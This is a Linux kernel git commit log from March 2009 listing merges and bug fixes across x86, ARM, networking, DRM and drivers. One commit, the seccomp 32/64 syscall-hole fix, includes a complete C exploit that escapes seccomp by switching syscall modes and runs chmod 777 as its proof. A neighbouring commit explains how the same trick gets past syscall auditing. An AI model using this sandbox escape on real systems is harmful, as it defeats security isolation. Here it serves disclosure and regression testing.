132232 Commits

Author SHA1 Message Date
Linus Torvalds
3024e4a997 Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip
* 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
  x86: oprofile: don't set counter width from cpuid on Core2
  x86: fix init_memory_mapping() to handle small ranges
2009-03-03 14:32:55 -08:00
Linus Torvalds
f2a4165526 Merge branch 'tracing/mmiotrace' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip
* 'tracing/mmiotrace' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
  x86 mmiotrace: fix race with release_kmmio_fault_page()
  x86 mmiotrace: improve handling of secondary faults
  x86 mmiotrace: split set_page_presence()
  x86 mmiotrace: fix save/restore page table state
  x86 mmiotrace: WARN_ONCE if dis/arming a page fails
  x86: add far read test to testmmiotrace
  x86: count errors in testmmiotrace.ko
2009-03-03 14:32:37 -08:00
Linus Torvalds
b24746c7be Merge branch 'core-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip
* 'core-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
  rcu: Teach RCU that idle task is not quiscent state at boot
2009-03-03 14:32:04 -08:00
Linus Torvalds
f41bf2ab99 Merge master.kernel.org:/home/rmk/linux-2.6-arm
* master.kernel.org:/home/rmk/linux-2.6-arm:
  [ARM] fix lots of ARM __devexit sillyness
  [ARM] 5417/1: Set the correct cacheid for ARMv6 CPUs with ARMv7 style MMU
  [ARM] 5416/1: Use unused address in v6_early_abort
  [ARM] 5411/1: S3C64XX: Fix EINT unmask
  [ARM] at91: fix for Atmel AT91 powersaving
  [ARM] RiscPC: Fix etherh oops
2009-03-03 14:12:41 -08:00
Russell King
bdf602bd73 [ARM] fix lots of ARM __devexit sillyness
`iop_adma_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
`mv_xor_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
`mv64xxx_i2c_unmap_regs' referenced in section `.devinit.text' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
`mv64xxx_i2c_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
`orion_nand_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o
`pxafb_remove' referenced in section `.data' of drivers/built-in.o: defined in discarded section `.devexit.text' of drivers/built-in.o

Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
2009-03-03 21:04:04 +00:00
Catalin Marinas
b57ee99fab [ARM] 5417/1: Set the correct cacheid for ARMv6 CPUs with ARMv7 style MMU
The cacheid_init() function assumes that if cpu_architecture() returns
7, the caches are VIPT_NONALIASING. The cpu_architecture() function
returns the version of the supported MMU features (e.g. TEX remapping)
but it doesn't make any assumptions about the cache type. The patch adds
the checking of the Cache Type Register for the ARMv7 format.

Signed-off-by: Catalin Marinas <catalin.marinas@arm.com>
Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
2009-03-03 12:11:26 +00:00
Seth Forshee
25ef4a67e7 [ARM] 5416/1: Use unused address in v6_early_abort
The target of the strex instruction to clear the exlusive monitor
is currently the top of the stack.  If the store succeeeds this
corrupts r0 in pt_regs.  Use the next stack location instead of
the current one to prevent any chance of corrupting an in-use
address.

Signed-off-by: Seth Forshee <seth.forshee@gmail.com>
Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
2009-03-03 12:11:25 +00:00
Tim Blechmann
780eef9492 x86: oprofile: don't set counter width from cpuid on Core2
Impact: fix stuck NMIs and non-working oprofile on certain CPUs

Resetting the counter width of the performance counters on Intel's
Core2 CPUs, breaks the delivery of NMIs, when running in x86_64 mode.

This should fix bug #12395:

  http://bugzilla.kernel.org/show_bug.cgi?id=12395

Signed-off-by: Tim Blechmann <tim@klingt.org>
Signed-off-by: Robert Richter <robert.richter@amd.com>
LKML-Reference: <20090303100412.GC10085@erda.amd.com>
Cc: <stable@kernel.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-03 12:04:22 +01:00
Tom Parker
97d4b35fb4 Blackfin arch: fix bug - Error if one serial has hardware flow control and the other doesn't
I have a system where UART0 is configured with hardware flow control, but UART1
doesn't have it enabled. Attempting to access UART1 in this configuration
results in the following error in dmesg:

<3>bfin-gpio: GPIO 0 is already reserved as Peripheral by bfin-uart !
<5>Stack from 0082bc7c:
<5>        0082bc88 00404dd6 00000003 00000000 0054051e 004079da 0082bcb4
00000000
<5>        00000003 00000000 0052686c 0113f2a0 005fa3f0 00000032 20515249
00003035
<5>        00427228 00526e50 0113f2e0 005fa3f0 00000032 0113f2e0 0054b748
0000ffff
<5>        22222222 22222222 004e1628 00427304 00000000 00000032 00000023
0054b748
<5>        00487a94 0054b7e8 0054b748 0000000b 00487fb8 0054b748 0054b748
00000001
<5>        0000000a 005fa3f0 009d4fe8 0101e3c0 0054b748 005fa3f0 0050b134
0054b748
<5>
<5>Call Trace:
<4>[<00485c16>] _uart_startup+0x56/0x178
<4>[<004865c8>] _uart_open+0x40/0x3e0
<4>[<0048661c>] _uart_open+0x94/0x3e0
<4>[<0047f1ce>] _init_dev+0x1fa/0x450
<4>[<004e1628>] ___mutex_unlock_slowpath+0x30/0xe8
<4>[<004815da>] _tty_open+0xf6/0x21c
<4>[<0043dab0>] ___path_lookup_intent_open+0x34/0x7c
<4>[<004375e4>] _chrdev_open+0x7c/0x134
<4>[<0043dc2c>] _open_namei+0x60/0x568
<4>[<00433fa2>] ___dentry_open+0x9e/0x188
<4>[<00437568>] _chrdev_open+0x0/0x134
<4>[<0043410c>] _nameidata_to_filp+0x30/0x3c
<4>[<00434152>] _do_filp_open+0x3a/0x44
<4>[<00408826>] _task_running_tick+0x102/0x278
<4>[<0043418e>] _do_sys_open+0x32/0xac
<4>[<0043ede4>] _sys_ioctl+0x28/0x50
<4>[<0043edbc>] _sys_ioctl+0x0/0x50
<4>[<00434224>] _sys_open+0x18/0x20
<4>[<0043420c>] _sys_open+0x0/0x20
<4>[<00418174>] _sys_setuid+0x0/0xc8

This is because the #ifdef's in bfin_serial_5xx.h are messed up. More
specifically, they add/remove the uart_{rts,cts}_pin fields in
bfin_serial_resources based on whether the particular port has rts/cts enabled,
as opposed to when either port has it enabled.

This patch fixed this.

Signed-off-by: Tom Parker <blackfin@tevp.net>
Signed-off-by: Sonic Zhang <sonic.zhang@analog.com>
Signed-off-by: Bryan Wu <cooloney@kernel.org>
2009-03-03 17:59:39 +08:00
Eric W. Biederman
17edde5209 netns: Remove net_alive
It turns out that net_alive is unnecessary, and the original problem
that led to it being added was simply that the icmp code thought
it was a network device and wound up being unable to handle packets
while there were still packets in the network namespace.

Now that icmp and tcp have been fixed to properly register themselves
this problem is no longer present and we have a stronger guarantee
that packets will not arrive in a network namespace then that provided
by net_alive in netif_receive_skb.  So remove net_alive allowing
packet reception run a little faster.

Additionally document the strong reason why network namespace cleanup
is safe so that if something happens again someone else will have
a chance of figuring it out.

Signed-off-by: Eric W. Biederman <ebiederm@aristanetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-03 01:14:27 -08:00
Eric W. Biederman
2f20d2e667 tcp: Like icmp use register_pernet_subsys
To remove the possibility of packets flying around when network
devices are being cleaned up use reisger_pernet_subsys instead of
register_pernet_device.

Signed-off-by: Eric W. Biederman <ebiederm@aristanetworks.com>
Acked-by: Denis V. Lunev <den@openvz.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-03 01:14:21 -08:00
Eric W. Biederman
6eb0777228 netns: Fix icmp shutdown.
Recently I had a kernel panic in icmp_send during a network namespace
cleanup.  There were packets in the arp queue that failed to be sent
and we attempted to generate an ICMP host unreachable message, but
failed because icmp_sk_exit had already been called.

The network devices are removed from a network namespace and their
arp queues are flushed before we do attempt to shutdown subsystems
so this error should have been impossible.

It turns out icmp_init is using register_pernet_device instead
of register_pernet_subsys.  Which resulted in icmp being shut down
while we still had the possibility of packets in flight, making
a nasty NULL pointer deference in interrupt context possible.

Changing this to register_pernet_subsys fixes the problem in
my testing.

Signed-off-by: Eric W. Biederman <ebiederm@aristanetworks.com>
Acked-by: Denis V. Lunev <den@openvz.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-03 01:14:15 -08:00
Daniel Lezcano
176c39af29 netns: fix addrconf_ifdown kernel panic
When a network namespace is destroyed the network interfaces are
all unregistered, making addrconf_ifdown called by the netdevice
notifier. 
In the other hand, the addrconf exit method does a loop on the network
devices and does addrconf_ifdown on each of them. But the ordering of 
the netns subsystem is not right because it uses the register_pernet_device
instead of register_pernet_subsys. If we handle the loopback as
any network device, we can safely use register_pernet_subsys.

But if we use register_pernet_subsys, the addrconf exit method will do
exactly what was already done with the unregistering of the network
devices. So in definitive, this code is pointless.

I removed the netns addrconf exit method and moved the code to the
addrconf cleanup function.

Signed-off-by: Daniel Lezcano <dlezcano@fr.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-03 01:06:45 -08:00
Mike Frysinger
ee554be9dd Blackfin arch: fix compile failure when missing the anomaly definition
make sure ANOMALY_05000278/ANOMALY_05000380 is defined for all parts

Signed-off-by: Mike Frysinger <vapier.adi@gmail.com>
Signed-off-by: Bryan Wu <cooloney@kernel.org>
2009-03-03 16:52:55 +08:00
Stephen Hemminger
b325fddb7f ipv6: Fix sysctl unregistration deadlock
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-03 00:47:47 -08:00
Stephen Hemminger
5a5990d309 net: Avoid race between network down and sysfs
Signed-off-by: Stephen Hemminger <shemminger@vyatta.com>
Acked-by: "Eric W. Biederman" <ebiederm@xmission.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-03 00:47:46 -08:00
Yinghai Lu
0fc59d3a01 x86: fix init_memory_mapping() to handle small ranges
Impact: fix failed EFI bootup in certain circumstances

Ying Huang found init_memory_mapping() has problem with small ranges
less than 2M when he tried to direct map the EFI runtime code out of
max_low_pfn_mapped.

It turns out we never considered that case and didn't check the range...

Reported-by: Ying Huang <ying.huang@intel.com>
Signed-off-by: Yinghai Lu <yinghai@kernel.org>
Cc: Brian Maly <bmaly@redhat.com>
LKML-Reference: <49ACDDED.1060508@kernel.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-03 08:50:22 +01:00
Russell King
07555c9880 OMAP: enable smc911x support for LDP platform
The following patch enables SMC911x support to work on the OMAP LDP
board.  Although the SMC911x driver will eventually be obsoleted, the
smsc911x patches are rather invasive for the -rc kernels.

Rather than risk destablising smsc911x, this simpler patch is preferred
to allow the network interface to work.

Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
Acked-by: Tony Lindgren <tony@atomide.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 22:29:37 -08:00
Wei Yongjun
3df2678737 sctp: fix kernel panic with ERROR chunk containing too many error causes
If ERROR chunk is received with too many error causes in ESTABLISHED
state, the kernel get panic.

This is because sctp limit the max length of cmds to 14, but while
ERROR chunk is received, one error cause will add around 2 cmds by
sctp_add_cmd_sf(). So many error causes will fill the limit of cmds
and panic.

This patch fixed the problem.

This bug can be test by SCTP Conformance Test Suite
<http://networktest.sourceforge.net/>.

Signed-off-by: Wei Yongjun <yjwei@cn.fujitsu.com>
Signed-off-by: Vlad Yasevich <vladislav.yasevich@hp.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 22:27:39 -08:00
Vlad Yasevich
d1dd524785 sctp: fix crash during module unload
An extra list_del() during the module load failure and unload
resulted in a crash with a list corruption.  Now sctp can
be unloaded again.

Signed-off-by: Vlad Yasevich <vladislav.yasevich@hp.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2009-03-02 22:27:38 -08:00
Linus Torvalds
2450cf51a1 Revert "menu: fix embedded menu snafu"
This reverts commit 155b25bcc28631a5b5230191aa3f56c40dfffa3f, which was
totally wrong - the "embedded" options still exists (very much so) even
on non-embedded platforms.

It's just that we don't bother with actually asking about them when
we're not embedded, we just take their default values (which is usually
'y' - the options add features that may not be worth it in a constrained
environment).

Noticed-by: Andrew Morton <akpm@linux-foundation.org>
Cc: Randy Dunlap <randy.dunlap@oracle.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 16:23:33 -08:00
Linus Torvalds
43e407071d Merge branch 'drm-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/airlied/drm-2.6
* 'drm-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/airlied/drm-2.6:
  drm/i915: Fix use-before-null-check in i915_irq_emit().
  drm: Avoid client deadlocks when the master disappears.
  drm: Wake up all lock waiters when the master disappears.
  drm: Don't return ERESTARTSYS to user-space.
2009-03-02 16:11:36 -08:00
Eric Anholt
299eb93c5f drm/i915: Fix use-before-null-check in i915_irq_emit().
This could be triggered by a client asking to emit an irq when the device
wasn't initialized.

Signed-off-by: Eric Anholt <eric@anholt.net>
Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03 09:53:05 +10:00
Thomas Hellstrom
fda714c29c drm: Avoid client deadlocks when the master disappears.
This is done by
1) Wake up lock waiters when we close the master file descriptor.
   Not when the master structure is removed, since the latter
   requires the waiters themselves to release the refcount on the
   master structure -> Deadlock.
2) Send a SIGTERM to all clients waiting for the lock.
   Normally these clients will get a SIGPIPE when the X server dies,
   but clients may also spin trying to grab the DRM lock, without
   getting any sort of notification.

Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com>
Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03 09:50:20 +10:00
Thomas Hellstrom
171901d15d drm: Wake up all lock waiters when the master disappears.
Currently only one waiter is woken up, leaving other waiters
hanging waiting for the DRM lock.

Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com>
Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03 09:49:54 +10:00
Thomas Hellstrom
4d77c88e91 drm: Don't return ERESTARTSYS to user-space.
That return code is for in-kernel use only.
Use EINTR instead.

Signed-off-by: Thomas Hellstrom <thellstrom@vmware.com>
Signed-off-by: Dave Airlie <airlied@linux.ie>
2009-03-03 09:49:46 +10:00
Randy Dunlap
155b25bcc2 menu: fix embedded menu snafu
The COMPAT_BRK kconfig symbol does not depend on EMBEDDED, but it is in
the midst of the EMBEDDED menu symbols, so it mucks up the EMBEDDED
menu.  Fix by moving it to just after all of the EMBEDDED menu symbols.

Also, surround all of the EMBEDDED symbols with "if EMBEDDED"/"endif" so
that this EMBEDDED block is clearer.

Signed-off-by: Randy Dunlap <randy.dunlap@oracle.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:49:16 -08:00
Linus Torvalds
d86a1c3de5 Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/drzeus/mmc
* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/drzeus/mmc:
  sdhci: Add NO_BUSY_IRQ quirk for Marvell CAFE host chip
  sdhci: Add quirk for controllers with no end-of-busy IRQ
2009-03-02 15:48:00 -08:00
Linus Torvalds
bd5e89c813 Merge branch 'fix/hda' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound-2.6
* 'fix/hda' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound-2.6:
  ALSA: hda - Add probe_mask default for Toshiba laptop with ALC268
  ALSA: hda - Add quirk for new HP xw series
  ALSA: hda - Fix digital mic on dell-m4-1 and dell-m4-3
2009-03-02 15:47:19 -08:00
Linus Torvalds
2d44947a56 Merge branch 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip
* 'x86-fixes-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/linux-2.6-tip:
  fix warning in io_mapping_map_wc()
  x86: i915 needs pgprot_writecombine() and is_io_mapping_possible()
2009-03-02 15:47:01 -08:00
Linus Torvalds
359aa09be9 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6
* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (29 commits)
  zaurus: add usb id for motomagx phones
  usbnet: make usbnet_get_link() fall back to ethtool_op_get_link()
  veth: Fix carrier detect
  cdc_ether: add usb id for Ericsson F3507g
  r8169: read MAC address from EEPROM on init (2nd attempt)
  tcp: fix retrans_out leaks
  net headers: export dcbnl.h
  net headers: cleanup dcbnl.h
  netpoll: Add drop checks to all entry points
  gianfar: Do right check on num_txbdfree
  pkt_sched: sch_drr: Fix oops in drr_change_class.
  b44: Disable device on shutdown
  b44: Unconditionally enable interrupt routing on reset
  net: fix hp-plus build error
  libertas: fix misuse of netdev_priv() and dev->ml_priv
  ipv6: don't use tw net when accounting for recycled tw
  asix: new device ids
  tcp_scalable: Update malformed & dead url
  netfilter: xt_recent: fix proc-file addition/removal of IPv4 addresses
  netxen: handle pci bar 0 mapping failure
  ...
2009-03-02 15:46:09 -08:00
Linus Torvalds
c742b4bf7a Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/jmorris/security-testing-2.6
* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/jmorris/security-testing-2.6:
  selinux: Fix a panic in selinux_netlbl_inode_permission()
2009-03-02 15:44:08 -08:00
Karsten Keil
fbfd8b5622 Change email address
Since I will loose the old address soon, please change it.

Signed-off-by: Karsten Keil <kkeil@linux-pingi.de>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:43:40 -08:00
Linus Torvalds
6b3bf20491 Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dtor/input
* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dtor/input:
  Input: elantech - touchpad driver miss-recognising logitech mice
  Input: synaptics - ensure we reset the device on resume
  Input: usbtouchscreen - fix eGalax HID ignoring
  Input: ambakmi - fix timeout handling in amba_kmi_write()
  Input: pxa930_trkball - fix write timeout handling
  Input: struct device - replace bus_id with dev_name(), dev_set_name()
  Input: bf54x-keys - fix debounce time validation
  Input: spitzkbd - mark probe function as __devinit
  Input: omap-keypad - mark probe function as __devinit
  Input: corgi_ts - mark probe function as __devinit
  Input: corgikbd - mark probe function as __devinit
  Input: uvc - the button on the camera is KEY_CAMERA
  Input: psmouse - make MOUSE_PS2_LIFEBOOK depend on X86
  Input: atkbd - make forced_release_keys[] static
  Input: usbtouchscreen - allow reporting calibrated data
2009-03-02 15:43:03 -08:00
Linus Torvalds
36b31106b7 Merge branch 'for_linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4
* 'for_linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4:
  ext4: don't call jbd2_journal_force_commit_nested without journal
  ext4: Reorder fs/Makefile so that ext2 root fs's are mounted using ext2
  ext4: Remove duplicate call to ext4_commit_super() in ext4_freeze()
2009-03-02 15:42:26 -08:00
Linus Torvalds
7b88ed671a Merge git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi-rc-fixes-2.6
* git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi-rc-fixes-2.6:
  [SCSI] mpt: fix disable lsi sas to use msi as default
  [SCSI] fix ABORTED_COMMAND looping forever problem
  [SCSI] sd: revive sd_index_lock
  [SCSI] cxgb3i: update the driver version to 1.0.1
  [SCSI] cxgb3i: Fix spelling errors in documentation
  [SCSI] cxgb3i: added missing include in cxgb3i_ddp.h
  [SCSI] cxgb3i: Outgoing pdus need to observe skb's MAX_SKB_FRAGS
  [SCSI] cxgb3i: added per-task data to track transmit progress
  [SCSI] cxgb3i: transmit work-request fixes
  [SCSI] hptiop: Add new PCI device ID
2009-03-02 15:41:59 -08:00
Roland McGrath
5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
Roland McGrath
ccbe495caa x86-64: syscall-audit: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases, audit_syscall_entry() will use the wrong system
call number table and the wrong system call argument registers.  This
could be used to circumvent a syscall audit configuration that filters
based on the syscall numbers or argument details.

Signed-off-by: Roland McGrath <roland@redhat.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
Andres Salomon
a0874897b1 sdhci: Add NO_BUSY_IRQ quirk for Marvell CAFE host chip
As described here: http://lkml.org/lkml/2009/2/20/265

The CAFE chip is broken due to commit e809517f6fa5803a5a1cd5602.
Anton added a quirk here: http://lkml.org/lkml/2009/2/20/279 that fixes
CAFE's problem.  This adds the quirk for CAFE.

Signed-off-by: Andres Salomon <dilinger@debian.org>
Signed-off-by: Pierre Ossman <drzeus@drzeus.cx>
2009-03-02 21:48:20 +01:00
Ben Dooks
f945405cde sdhci: Add quirk for controllers with no end-of-busy IRQ
The Samsung SDHCI (and FSL eSDHC) controller block seems to fail
to generate an INT_DATA_END after the transfer has completed and
the bus busy state finished.

Changes in e809517f6fa5803a5a1cd56026f0e2190fc13d5c to use the
new busy method are the cause of the behaviour change.

Signed-off-by: Ben Dooks <ben-linux@fluff.org>
Signed-off-by: Anton Vorontsov <avorontsov@ru.mvista.com>
Signed-off-by: Pierre Ossman <drzeus@drzeus.cx>
2009-03-02 21:46:35 +01:00
Bernd Schmidt
e84dcaa18b Blackfin arch: fix bug - jump_to_zero test case failed on noMPU kernel
The nompu code is now derived from the mpu code, and had the same problem -
no null pointer detection on ICPLBs.

Signed-off-by: Bernd Schmidt <bernds_cb1@t-online.de>
Cc: Mike Frysinger <vapier.adi@gmail.com>
Signed-off-by: Bryan Wu <cooloney@kernel.org>
2009-03-02 18:37:48 +08:00
Mike Frysinger
34d464f8aa Blackfin arch: use common KGDB_TESTS rather than our own KGDB_TESTCASE
Signed-off-by: Mike Frysinger <vapier.adi@gmail.com>
Signed-off-by: Bryan Wu <cooloney@kernel.org>
2009-03-02 18:14:47 +08:00
Michael Hennerich
0f29456a21 Blackfin arch: Make IRQ_EPPIx_ERROR naming consistent
Signed-off-by: Michael Hennerich <michael.hennerich@analog.com>
Signed-off-by: Bryan Wu <cooloney@kernel.org>
2009-03-02 18:06:13 +08:00
Sonic Zhang
28e4cf22a3 Blackfin arch: Disable NAND option by default
Signed-off-by: Sonic Zhang <sonic.zhang@analog.com>
Signed-off-by: Bryan Wu <cooloney@kernel.org>
2009-03-02 18:04:24 +08:00
Mike Frysinger
a572e217c6 Blackfin arch: drop untested and useless "generic" board file
Signed-off-by: Mike Frysinger <vapier.adi@gmail.com>
Signed-off-by: Bryan Wu <cooloney@kernel.org>
2009-03-02 17:22:36 +08:00
Pekka Paalanen
340430c572 x86 mmiotrace: fix race with release_kmmio_fault_page()
There was a theoretical possibility to a race between arming a page in
post_kmmio_handler() and disarming the page in
release_kmmio_fault_page():

cpu0                             cpu1
------------------------------------------------------------------
mmiotrace shutdown
enter release_kmmio_fault_page
                                 fault on the page
                                 disarm the page
disarm the page
                                 handle the MMIO access
                                 re-arm the page
put the page on release list
remove_kmmio_fault_pages()
                                 fault on the page
                                 page not known to mmiotrace
                                 fall back to do_page_fault()
                                 *KABOOM*

(This scenario also shows the double disarm case which is allowed.)

Fixed by acquiring kmmio_lock in post_kmmio_handler() and checking
if the page is being released from mmiotrace.

Signed-off-by: Pekka Paalanen <pq@iki.fi>
Cc: Stuart Bennett <stuart@freedesktop.org>
Cc: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-02 10:20:37 +01:00
Stuart Bennett
3e39aa156a x86 mmiotrace: improve handling of secondary faults
Upgrade some kmmio.c debug messages to warnings.
Allow secondary faults on probed pages to fall through, and only log
secondary faults that are not due to non-present pages.

Patch edited by Pekka Paalanen.

Signed-off-by: Stuart Bennett <stuart@freedesktop.org>
Signed-off-by: Pekka Paalanen <pq@iki.fi>
Cc: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-02 10:20:37 +01:00
Pekka Paalanen
0b700a6a25 x86 mmiotrace: split set_page_presence()
From 36772dcb6ffbbb68254cbfc379a103acd2fbfefc Mon Sep 17 00:00:00 2001
From: Pekka Paalanen <pq@iki.fi>
Date: Sat, 28 Feb 2009 21:34:59 +0200

Split set_page_presence() in kmmio.c into two more functions set_pmd_presence()
and set_pte_presence(). Purely code reorganization, no functional changes.

Signed-off-by: Pekka Paalanen <pq@iki.fi>
Cc: Stuart Bennett <stuart@freedesktop.org>
Cc: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-02 10:20:36 +01:00
Pekka Paalanen
5359b585fb x86 mmiotrace: fix save/restore page table state
From baa99e2b32449ec7bf147c234adfa444caecac8a Mon Sep 17 00:00:00 2001
From: Pekka Paalanen <pq@iki.fi>
Date: Sun, 22 Feb 2009 20:02:43 +0200

Blindly setting _PAGE_PRESENT in disarm_kmmio_fault_page() overlooks the
possibility, that the page was not present when it was armed.

Make arm_kmmio_fault_page() store the previous page presence in struct
kmmio_fault_page and use it on disarm.

This patch was originally written by Stuart Bennett, but Pekka Paalanen
rewrote it a little different.

Signed-off-by: Pekka Paalanen <pq@iki.fi>
Cc: Stuart Bennett <stuart@freedesktop.org>
Cc: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-02 10:20:36 +01:00
Stuart Bennett
e9d54cae8f x86 mmiotrace: WARN_ONCE if dis/arming a page fails
Print a full warning once, if arming or disarming a page fails.

Also, if initial arming fails, do not handle the page further. This
avoids the possibility of a page failing to arm and then later claiming
to have handled any fault on that page.

WARN_ONCE added by Pekka Paalanen.

Signed-off-by: Stuart Bennett <stuart@freedesktop.org>
Signed-off-by: Pekka Paalanen <pq@iki.fi>
Cc: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
2009-03-02 10:20:35 +01:00